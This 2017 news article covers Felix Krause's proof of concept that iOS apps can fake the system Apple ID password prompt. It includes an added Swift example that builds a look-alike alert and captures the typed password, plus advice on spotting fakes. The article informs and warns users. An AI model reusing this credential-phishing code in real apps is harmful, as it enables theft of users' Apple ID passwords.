UPDATED 22:26 EDT / OCTOBER 10 2017

APPS

Proof-of-concept demonstrates how easy it is to fool Apple users with a simple popup

Apple iOS users are being warned to be wary of malicious popups after a mobile app developer published a proof-of-concept phishing attack that mimics the iOS Apple ID login prompt with an ordinary in-app alert dialog.

The proof-of-concept was detailed by Felix Krause, founder of the open-source app-building tool fastlane. He wrote in a blog post that Apple’s reliance on asking users to regularly enter their passwords to undertake a range of functions presents a security hole that could easily be used by hackers to steal user credentials.

iOS asks users for their Apple ID password for many reasons; the most common are a recently installed iOS update or an app that is stuck during installation.

“Users are trained to just enter their Apple ID password whenever iOS prompts you to do so. However, those popups are not only shown on the lock screen, and the home screen, but also inside random apps, e.g. when they want to access iCloud, GameCenter or In-App-Purchases,” he wrote. “This could easily be abused by any app, just by showing a UIAlertController, that looks exactly like the system dialog.”

The proof-of-concept is a standard in-app alert dialog styled to mimic the Apple iOS password prompt. In Krause’s side-by-side screenshot, the fake popup (right) is indistinguishable from the genuine iOS password prompt (left).
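To show how little is involved, here is an added illustration of the technique Krause describes: an ordinary UIAlertController dressed up as the Apple ID prompt. This is not Krause’s own code, and the title and message strings only approximate the real system dialog; the class name, the `appleID` parameter and the `onPassword` callback are illustrative choices.

```swift
import UIKit

// Added example of the technique the article describes, not Felix Krause's
// original proof-of-concept code. The dialog text is an approximation of the
// genuine iOS prompt, chosen here for illustration.
final class FakeSignInPrompt {

    /// Builds the look-alike alert. `onPassword` receives whatever the user
    /// types, which is the credential-theft step of the proof of concept.
    static func make(appleID: String,
                     onPassword: @escaping (String) -> Void) -> UIAlertController {
        let alert = UIAlertController(
            title: "Sign In to iTunes Store",
            message: "Enter the password for your Apple ID \"\(appleID)\".",
            preferredStyle: .alert)

        alert.addTextField { field in
            field.placeholder = "Password"
            field.isSecureTextEntry = true   // masked input, as in the real prompt
        }

        alert.addAction(UIAlertAction(title: "Cancel", style: .cancel))
        alert.addAction(UIAlertAction(title: "Sign In", style: .default) { _ in
            // The alert belongs to this app, so the typed password is simply a
            // string the app can read, log or send anywhere it likes.
            onPassword(alert.textFields?.first?.text ?? "")
        })
        return alert
    }
}

// Presenting it from any view controller is a single call:
//
//   let prompt = FakeSignInPrompt.make(appleID: "user@example.com") { password in
//       print("captured:", password)
//   }
//   present(prompt, animated: true)
//
// Because the alert is drawn by the app's own process, pressing Home sends the
// app to the background and the dialog vanishes with it. A genuine Apple ID
// prompt is drawn by the system and stays on screen. That difference is the
// check recommended later in the article.
```

Nothing in the block is privileged or unusual: no entitlement, no private API, no overlay permission. Any app on the App Store can present this dialog, which is the point of the proof of concept.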

“iOS should very clearly distinguish between system UI and app UI elements, so that ideally it’s … obvious for the average smartphone user that something seems off,” Krause added. “This is a tricky problem to solve, and Web browsers are still tackling it; you still have websites that make popups look like macOS/iOS popups so that many users think [they are] system message[s].”

Krause recommends that iPhone and iPad users press the home button whenever they are prompted for their password, to determine whether the request is legitimate. If the app closes and the popup disappears with it, the prompt was drawn by the app and was a phishing attempt; if the app and the password prompt remain on screen, it is a genuine system dialog. The test works because system dialogs are presented by a separate system process rather than by the app itself.

As an alternative, users can switch to Android, which despite being more open to malware doesn’t suffer from user experience failures of exactly this kind as often as Apple products sometimes do, though the underlying trick, an app drawing a dialog that imitates the platform’s own, is not unique to any one operating system.

Image: Felix Krause
